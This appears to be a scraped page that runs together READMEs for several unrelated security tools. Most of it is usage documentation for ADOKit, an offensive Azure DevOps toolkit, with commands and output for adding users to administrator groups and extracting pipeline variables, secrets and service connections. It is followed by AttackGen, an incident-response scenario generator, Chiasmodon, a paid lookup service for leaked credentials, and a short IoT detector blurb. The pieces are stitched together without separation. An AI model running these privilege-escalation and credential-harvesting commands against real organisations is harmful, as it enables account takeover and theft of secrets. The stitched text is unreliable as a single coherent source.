Provide the getpermissions
module and the project you would like to search for in the /project:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.
ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"
ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"
C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[*] INFO: List ing group members for each group that has permissions to this project
GROUP NAME: [MaraudersMap]\Build Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Contributors
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributo rs | user1@YourOrganization.onmicrosoft.com | User 1
[MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2
GROUP NAME: [MaraudersMap]\MaraudersMap Team
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Valid Users
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Readers
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 13:11:18 Finished execution of getpermissions
Add a user to the Project Administrators group for a given project.
Provide the addprojectadmin
module along with a /project:
and /user:
for a given user to be added to the Project Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 2:52:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 18:52:47 Finished execution of addprojectadmin
Remove a user from the Project Administrators group for a given project.
Provide the removeprojectadmin
module along with a /project:
and /user:
for a given user to be removed from the Project Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:19:43 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 19:19:44 Finished execution of removeprojectadmin
Add a user to the Build Administrators group for a given project.
Provide the addbuildadmin
module along with a /project:
and /user:
for a given user to be added to the Build Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:41:51 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 19:41:55 Finished execution of addbuildadmin
Remove a user from the Build Administrators group for a given project.
Provide the removebuildadmin
module along with a /project:
and /user:
for a given user to be removed from the Build Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:42:10 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------
4/4/23 19:42:11 Finished execution of removebuildadmin
Add a user to the Project Collection Administrators group.
Provide the addcollectionadmin
module along with a /user:
for a given user to be added to the Project Collection Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:04:40 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 20:04:43 Finished execution of addcollectionadmin
Remove a user from the Project Collection Administrators group.
Provide the removecollectionadmin
module along with a /user:
for a given user to be removed from the Project Collection Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:10:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 20:10:38 Finished execution of removecollectionadmin
Add a user to the Project Collection Build Administrators group.
Provide the addcollectionbuildadmin
module along with a /user:
for a given user to be added to the Project Collection Build Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:39 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:21:42 Finished execution of addcollectionbuildadmin
Remove a user from the Project Collection Build Administrators group.
Provide the removecollectionbuildadmin
module along with a /user:
for a given user to be removed from the Project Collection Build Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------
4/5/23 12:22:02 Finished execution of removecollectionbuildadmin
Add a user to the Project Collection Build Service Accounts group.
Provide the addcollectionbuildsvc
module along with a /user:
for a given user to be added to the Project Collection Build Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:13 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:22:15 Finished execution of addcollectionbuildsvc
Remove a user from the Project Collection Build Service Accounts group.
Provide the removecollectionbuildsvc
module along with a /user:
for a given user to be removed from the Project Collection Build Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:27 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------
4/5/23 12:22:28 Finished execution of removecollectionbuildsvc
Add a user to the Project Collection Service Accounts group.
Provide the addcollectionsvc
module along with a /user:
for a given user to be added to the Project Collection Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:01 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 15:21:04 Finished execution of addcollectionsvc
Remove a user from the Project Collection Service Accounts group.
Provide the removecollectionsvc
module along with a /user:
for a given user to be removed from the Project Collection Service Accounts
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:43 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/5/23 15:21:44 Finished execution of removecollectionsvc
Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.
Provide the getpipelinevars
module along with a /project:
for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/6/2023 12:08:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/
4/6/23 16:08:36 Finished execution of getpipelinevars
Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.
Provide the getpipelinesecrets
module along with a /project:
for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/10/2023 10:28:37 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]
4/10/23 14:28:38 Finished execution of getpipelinesecrets
List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.
Provide the getserviceconnections
module along with a /project:
for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all
in the /project:
argument.
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/11/2023 8:34:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382
4/11/23 12:34:16 Finished execution of getserviceconnections
Below are static signatures for the specific usage of this tool in its default state:
{60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
ADOKit-21e233d4334f9703d1a3a42b6e2efd38
ADOKitUsage.json
- Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)PersistenceTechniqueWithADOKit.json
- Detects the creation of a PAT or SSH key with ADOKitFor detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.
https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops
AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.
If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! โญ
What's new? | Why is it useful? |
---|---|
Mistral API Integration | - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case. |
Local Model Support using Ollama | - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app |
Optional LangSmith Integration | - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith. |
Various Bug Fixes and Improvements | - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust. |
What's new? | Why is it useful? |
---|---|
Azure OpenAI Service Integration | - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements. - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models. |
LangSmith for Azure OpenAI Service | - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios. - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction. |
Model Selection for OpenAI API | - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview . This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case. |
Docker Container Image | - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform. |
What's new? | Why is it useful? |
---|---|
Custom Scenarios based on ATT&CK Techniques | - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group. - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture. |
User feedback on generated scenarios | - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks. |
Improved error handling for missing API keys | - Improved user experience. |
Replaced Streamlit st.spinner widgets with new st.status widget | - Provides better visibility into long running processes (i.e. scenario generation). |
Initial release.
langchain
and mitreattack
).enterprise-attack.json
(MITRE ATT&CK dataset in STIX format) and groups.json
.git clone https://github.com/mrwadams/attackgen.git
cd attackgen
pip install -r requirements.txt
docker pull mrwadams/attackgen
If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml
file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example
file in the .streamlit/
directory that you can use as a template for your own secrets.toml file.
If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml
file in place, but you can leave the LANGCHAIN_API_KEY
field empty.
Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/
directory within the repository.
After the data setup, you can run AttackGen with the following command:
streamlit run ๐_Welcome.py
You can also try the app on Streamlit Community Cloud.
streamlit run ๐_Welcome.py
docker run -p 8501:8501 mrwadams/attackgen
This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501
. 3. Use the app to generate standard or custom incident response scenarios (see below for details).
Threat Group Scenarios
page..streamlit/secrets.toml
file.Custom Scenario
page..streamlit/secrets.toml
file.Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.
I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.
This project is licensed under GNU GPLv3.
Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about a target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. the tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.
๐ฑPhone: Get ready to uncover even more valuable data by searching for information associated with phone numbers. Whether you're investigating a particular individual or looking for connections between phone numbers and other entities, this new feature will provide you with valuable insights.
๐ขCompany Name: We understand the importance of comprehensive company research. In our upcoming release, you'll be able to search by company name and access a wide range of documents associated with that company. This feature will provide you with a convenient and efficient way to gather crucial information, such as legal documents, financial reports, and other relevant records.
๐คFace (Photo): Visual data is a powerful tool, and we are excited to introduce our advanced facial recognition feature. With "Search by Face (Photo)," you can upload an image containing a face and leverage cutting-edge technology to identify and match individuals across various data sources. This will allow you to gather valuable information, such as social media profiles, online presence, and potential connections, all through the power of facial recognition.
Chiasmodon niger is a species of deep sea fish in the family Chiasmodontidae. It is known for its ability to swallow fish larger than itself. and so do we. ๐ย
Join us today and unlock the potential of our cutting-edge OSINT tool. Contact https://t.me/Chiasmod0n on Telegram to subscribe and start harnessing the power of Chiasmodon for your domain investigations.
pip install chiasmodon
Chiasmodon provides a flexible and user-friendly command-line interface and python library. Here are some examples to demonstrate its usage:
How to use pychiasmodon library:
from pychiasmodon import Chiasmodon as ch
token = "PUT_HERE_YOUR_API_KEY"
obj = ch(token)
Searching for a target domain and its subdomains:
bash chiasmodon_cli.py --domain example.com --all
Python ```python result = obj.search('example.com',method='domain', all=True)
for i in result: print(i) ```
Searching for a target domain, you will see the result for only this "example.com":
bash chiasmodon_cli.py --domain example.com
Python ```python result = obj.search('example.com',method='domain')
for i in result: print(i) ```
Searching for a target application ID on the Google Play Store:
bash chiasmodon_cli.py --app com.discord
Python ```python result = obj.search('com.discord',method='app')
for i in result: print(i) ```
Searching for a target ASN:
bash chiasmodon_cli.py --asn AS123 --view-type cred
Python ```python result = obj.search('AS123',method='asn', view_type='cred')
for i in result: print(i) ```
earching for a target username:
bash chiasmodon_cli.py --username someone
Python ```python result = obj.search('someone',method='username')
for i in result: print(i) ```
Searching for a target password:
bash chiasmodon_cli.py --password example@123
Python ```python result = obj.search('example@123',method='password')
for i in result: print(i) ```
Searching for a target CIDR:
bash chiasmodon_cli.py --cidr x.x.x.x/24
Python ```python result = obj.search('x.x.x.x/24',method='cidr')
for i in result: print(i) ```
Searching for target credentials by domain emails:
bash chiasmodon_cli.py --domain example.com --domain-emails
Python ```python result = obj.search('example.com',method='domain', only_domain_emails=True)
for i in result: print(i) ``` - All methods and view types:
Methods | View Type |
---|---|
--domain, --email, --cidr, --app, --asn, --username, --password | --view-type cred |
--cidr, --asn, --email, --username, --password | --view-type app |
--domain, --email, --cidr, --asn, --username, --password | --view-type url |
--domain | --view-type subdomain |
--domain, --cidr, --asn, --app | --view-type email |
--domain, --cidr, --app, --asn, --email, --password | --view-type username |
--domain, --cidr, --app, --asn, --email, --username | --view-type password |
Please note that these examples represent only a fraction of the available options and use cases. Refer to the documentation for more detailed instructions and explore the full range of features provided by Chiasmodon.
Contributions and feedback are welcome! If you encounter any issues or have suggestions for improvements, please submit them to the Chiasmodon GitHub repository. Your input will help us enhance the tool and make it more effective for the OSINT community.
Chiasmodon is released under the MIT License. See the LICENSE file for more details.
Chiasmodon is intended for legal and authorized use only. Users are responsible for ensuring compliance with applicable laws and regulations when using the tool. The developers of Chiasmodon disclaim any responsibility for the misuse or illegal use of the tool.
Chiasmodon is the result of collaborative efforts from a dedicated team of contributors who believe in the power of OSINT. We would like to express our gratitude to the open-source community for their valuable contributions and support.
ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.
~ Hilali Abdel
USAGE
